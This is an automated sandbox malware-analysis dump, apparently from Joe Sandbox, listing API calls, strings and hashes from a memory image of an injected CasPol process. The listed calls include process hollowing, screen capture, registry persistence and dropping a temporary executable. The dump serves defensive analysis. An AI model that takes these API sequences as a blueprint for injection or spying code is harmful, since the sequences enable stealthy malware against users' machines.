                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                              • String ID:
                                                                              • API String ID: 4212172061-0
                                                                              • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                              • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileFind$FirstH_prologNext
                                                                              • String ID:
                                                                              • API String ID: 301083792-0
                                                                              • Opcode ID: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                              • Opcode Fuzzy Hash: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00448067
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                              • String ID:
                                                                              • API String ID: 806657224-0
                                                                              • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                              • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                              • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                              • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                              • String ID:
                                                                              • API String ID: 2829624132-0
                                                                              • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                              • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                              • String ID:
                                                                              • API String ID: 3906539128-0
                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                                                                              • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                                                                              • ExitProcess.KERNEL32 ref: 0044258E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: GetLocaleInfoEx
                                                                              • API String ID: 2299586839-2904428671
                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                              • String ID:
                                                                              • API String ID: 1663032902-0
                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
                                                                              • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                              • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                              • String ID:
                                                                              • API String ID: 2692324296-0
                                                                              • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                              • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
                                                                              • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                              • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                              APIs
                                                                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                              • EnumSystemLocalesW.KERNEL32(Function_00047068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                              • String ID:
                                                                              • API String ID: 1272433827-0
                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                              APIs
                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001), ref: 00450D2E
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                              • String ID:
                                                                              • API String ID: 1084509184-0
                                                                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                              • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HeapProcess
                                                                              • String ID:
                                                                              • API String ID: 54951025-0
                                                                              • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                              • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                              • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                              • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                              APIs
                                                                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                              • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                              • DeleteDC.GDI32(?), ref: 0041805D
                                                                              • DeleteDC.GDI32(00000000), ref: 00418060
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                              • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                              • DeleteObject.GDI32(?), ref: 004180FA
                                                                              • DeleteObject.GDI32(?), ref: 00418107
                                                                              • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                              • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                              • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                              • DeleteDC.GDI32(?), ref: 0041827F
                                                                              • DeleteDC.GDI32(00000000), ref: 00418282
                                                                              • DeleteObject.GDI32(00000000), ref: 00418285
                                                                              • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                              • DeleteObject.GDI32(00000000), ref: 00418344
                                                                              • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                              • DeleteDC.GDI32(?), ref: 0041835B
                                                                              • DeleteDC.GDI32(00000000), ref: 00418366
                                                                              • DeleteDC.GDI32(?), ref: 00418398
                                                                              • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                              • DeleteObject.GDI32(?), ref: 004183A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                              • String ID: DISPLAY
                                                                              • API String ID: 1765752176-865373369
                                                                              • Opcode ID: a503a9b89ef94286f2bd859c106661c8df3b5c206ce18e082a0ee4f25f069b57
                                                                              • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                              • Opcode Fuzzy Hash: a503a9b89ef94286f2bd859c106661c8df3b5c206ce18e082a0ee4f25f069b57
                                                                              • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                              • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                              • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                              • ResumeThread.KERNEL32(?), ref: 00417582
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                              • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                              • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                              • GetLastError.KERNEL32 ref: 004175C7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                              • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                              • API String ID: 4188446516-3035715614
                                                                              • Opcode ID: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                              • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                              • Opcode Fuzzy Hash: 54fdfb5aabe8aa90e4b9fd0d09de0377c5cbab22ce463c390d1f780909c70293
                                                                              • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                              APIs
                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                              • ExitProcess.KERNEL32 ref: 0041151D
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                              • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                              • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                              • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
